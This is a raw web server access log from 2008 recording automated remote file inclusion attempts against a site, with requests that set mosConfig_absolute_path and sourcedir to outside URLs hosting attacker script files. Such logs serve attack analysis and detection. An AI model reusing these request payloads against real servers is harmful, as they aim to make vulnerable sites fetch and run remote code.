216.246.8.237 - - [31/Aug/2008:09:14:04 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89700 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:14:04 -0700] "GET /logs/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:09:14:22 -0700] "GET /logs/access_070918.log HTTP/1.0" 200 51808 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.15.2.85 - - [31/Aug/2008:09:14:23 -0700] "GET /logs/access_080526.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:14:25 -0700] "GET /logs/access_080111.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:14:43 -0700] "GET /logs/access_080519.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:14:44 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89732 "-" "libwww-perl/5.811" "www.dmulk.com"
